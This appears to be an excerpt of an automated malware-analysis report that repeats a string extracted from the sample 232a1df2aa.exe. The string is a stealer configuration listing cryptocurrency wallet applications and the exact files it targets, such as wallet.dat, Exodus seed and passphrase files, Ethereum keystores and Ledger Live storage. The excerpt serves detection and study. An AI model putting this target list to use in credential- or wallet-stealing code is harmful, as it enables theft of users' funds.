Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 